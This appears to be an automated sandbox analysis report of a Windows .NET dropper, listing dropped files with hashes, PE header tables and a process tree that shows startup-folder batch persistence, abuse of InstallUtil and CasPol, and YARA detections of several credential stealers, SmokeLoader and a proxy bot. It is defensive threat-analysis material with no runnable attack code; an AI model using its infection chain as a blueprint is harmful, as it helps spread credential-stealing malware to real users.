Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.7684781715563425
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:WnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXH+:FWqlkLESgCRE/vhOjb05efd6e/oXH+
                                                                                                                          MD5:BCC38593B03EE04D072E36C9513BCF54
                                                                                                                          SHA1:23C84983EAB71EFBC7615B0E60A67D0D1C3A62D4
                                                                                                                          SHA-256:6B6A921F87E6FCC245DE2BADD36F3276B8A6662BBA129EDE2BE971FCF472FB8C
                                                                                                                          SHA-512:F6C75DDFB5B82466BC8271B4D6BA2B2AAC093F7F67C92C4AB0370C2FF15793BBC62170FC891836BB2B30EAC431F2302CC8B75AA6BA77E974F2F85FCC5A693241
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....8v-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55
                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1835008
                                                                                                                          Entropy (8bit):4.421686715843269
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:RSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:ovloTMW+EZMM6DFy403w
                                                                                                                          MD5:129C8997F4DF0A815BAB1D6AA459C4AD
                                                                                                                          SHA1:5603041D4ABCCF6A273869C60616E5274289906D
                                                                                                                          SHA-256:06799E4AA44534A144398A9FEB045D1408414D82B069B3DDDDDAE2EDB2E4EAF6
                                                                                                                          SHA-512:926AF488AEAE039FEBF232E96123E470BF95E0F03CC602FB27441B9CFEA2DAF6D6F232815F4155B6C82FDC441CA4B73E7B6FEEA911721EDF50DBD4B3A8E8E00C
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf>...=....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm._~4Rt................................................................................................................................................................................................................................................................................................................................................h.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1744896
                                                                                                                          Entropy (8bit):4.574651723001575
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:7Svfpi6ceLP/9skLmb0OTMWSPDaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:mvloTMWSEZMM6DFy403w
                                                                                                                          MD5:4B07F2941DDF768D81082271849A47FD
                                                                                                                          SHA1:BBF1AC4DCFB2BACFAAD1B53D7BF5528EFDCEA923
                                                                                                                          SHA-256:12DDA2DCA7F548077C64A14F8B4CE9DB0B6C2EFF777F6D8A2FDFCA0F766FA392
                                                                                                                          SHA-512:1ECAD78C6E3DA4557E60B13CCF6EC3BEB5EB6BAB287238290763E85B9E48C47D105D78723A68AE3F3D2EAA15F5B2E0CCA824608F3AA787B2359942179B2E20AB
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf=...=....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm._~4Rt................................................................................................................................................................................................................................................................................................................................................h.HvLE........=.............!..g...9C.1*......0...@...`..hbin.................\.Z............nk,..\.Z........ ..........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........U...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..<...............
                                                                                                                          File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                          Entropy (8bit):5.827404709879398
                                                                                                                          TrID:
                                                                                                                          • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                                                          • Win64 Executable GUI (202006/5) 46.43%
                                                                                                                          • Win64 Executable (generic) (12005/4) 2.76%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                                                          • DOS Executable Generic (2002/1) 0.46%
                                                                                                                          File name:file.exe
                                                                                                                          File size:40'448 bytes
                                                                                                                          MD5:699e79d0f4a7586ffe53d0dabc5c0a5a
                                                                                                                          SHA1:7178ab85fe6190259b64846c76af01b8da5b0cd4
                                                                                                                          SHA256:b930e1b461a4c64396b0c52f17d7c504a5e8dc24114ff186eb129e8a548143ca
                                                                                                                          SHA512:56bab1c5eaf18bef213da76f8c5ccdc15ce6fd59d93cfff77604378a1f474f2045d975ebd14563f712c9054f0a6b8e35c42f311322bca192d1f68bf5684aa526
                                                                                                                          SSDEEP:768:sRyIN4srhwS4CGlB7+zM2WiWYiP8gzBggIfiN5SNUJ:2yIN42h6n2rWiKPPzBm9Ns
                                                                                                                          TLSH:57036D21B3AC873BCEEE07B9AC61614013749362B982CF9D5CD865AF44AB7C503163A7
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...I.B..........."...0.....&............ ....@...... ....................................`................................
                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                          Entrypoint:0x400000
                                                                                                                          Entrypoint Section:
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0xAF428149 [Tue Mar 6 01:47:53 2063 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:
Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x626 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb234 | 0x38 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x930a | 0x9400 | a75771b70601ca0fe7c1a66e8cc9bde5 | False | 0.5053578969594594 | data | 5.9423712891807465 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xc000 | 0x626 | 0x800 | 7ccd95491660fbda3924dbe08f84df33 | False | 0.32421875 | data | 3.4778778318304995 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0xc0a0 | 0x39c | data | | | 0.38852813852813856 |
| RT_MANIFEST | 0xc43c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

Target ID: 0
Start time: 08:52:03
Start date: 12/03/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\file.exe
Imagebase: 0x2c8b7e00000
File size: 40'448 bytes
MD5 hash: 699E79D0F4A7586FFE53D0DABC5C0A5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 2
Start time: 08:52:04
Start date: 12/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff7e52b0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 08:52:15
Start date: 12/03/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Imagebase:
File size: 108'664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 08:52:16
Start date: 12/03/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
Imagebase: 0xec0000
File size: 42'064 bytes
MD5 hash: 5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 5
Start time: 08:52:16
Start date: 12/03/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
Imagebase:
File size: 42'064 bytes
MD5 hash: 5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 6
Start time: 08:52:16
Start date: 12/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase: 0x7ff7e52b0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 7
Start time: 08:52:16
Start date: 12/03/2024
Path: C:\Windows\System32\WerFault.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892
Imagebase: 0x7ff683db0000
File size: 570'736 bytes
MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 08:52:17
Start date: 12/03/2024
Path: C:\Windows\System32\WerFault.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WerFault.exe -u -p 1892 -s 55932
Imagebase: 0x7ff683db0000
File size: 570'736 bytes
MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 10
Start time: 08:52:29
Start date: 12/03/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat" "
Imagebase: 0x7ff619040000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 08:52:29
Start date: 12/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 08:52:38
Start date: 12/03/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.bat" "
Imagebase: 0x7ff619040000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 08:52:38
Start date: 12/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 08:52:38
Start date: 12/03/2024
Path: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe"
Imagebase: 0x400000
File size: 1'956'920 bytes
MD5 hash: 17B5157E8F35F33EB2325EE5751BCF3B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 15
Start time: 08:52:38
Start date: 12/03/2024
Path: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp" /SL5="$4043A,1591872,56832,C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:706'560 bytes
                                                                                                                          MD5 hash:F1EEAE7DAB5E51B2A76DB6651423C9F5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:16
                                                                                                                          Start time:08:52:40
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -i
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'888'210 bytes
                                                                                                                          MD5 hash:7BFD8C9EBE20C4BF0BED7F74A74E8646
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000010.00000000.2385672788.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 37%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:17
                                                                                                                          Start time:08:52:41
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -s
                                                                                                                          Imagebase:0x7ff6068e0000
                                                                                                                          File size:1'888'210 bytes
                                                                                                                          MD5 hash:7BFD8C9EBE20C4BF0BED7F74A74E8646
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000011.00000000.2392543907.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000011.00000002.3389219004.0000000000908000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false

                                                                                                                          Target ID:19
                                                                                                                          Start time:08:52:51
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.bat" "
                                                                                                                          Imagebase:0x7ff619040000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:20
                                                                                                                          Start time:08:52:51
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:21
                                                                                                                          Start time:08:52:56
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:2'146'090 bytes
                                                                                                                          MD5 hash:0D69DD3893505245669619A06840C2FE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:22
                                                                                                                          Start time:08:52:57
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:204'288 bytes
                                                                                                                          MD5 hash:220CB1B1688C2364B9AB272E37B896F3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000016.00000002.3368358435.0000000000652000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false

                                                                                                                          Target ID:23
                                                                                                                          Start time:08:53:00
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe" --silent --allusers=0
                                                                                                                          Imagebase:0x390000
                                                                                                                          File size:2'960'760 bytes
                                                                                                                          MD5 hash:918151F14C10B6BB7533F6D97BF22D2D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:24
                                                                                                                          Start time:08:53:00
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0
                                                                                                                          Imagebase:0x390000
                                                                                                                          File size:2'960'760 bytes
                                                                                                                          MD5 hash:918151F14C10B6BB7533F6D97BF22D2D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:25
                                                                                                                          Start time:08:53:00
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:175'104 bytes
                                                                                                                          MD5 hash:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000019.00000002.2841787321.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
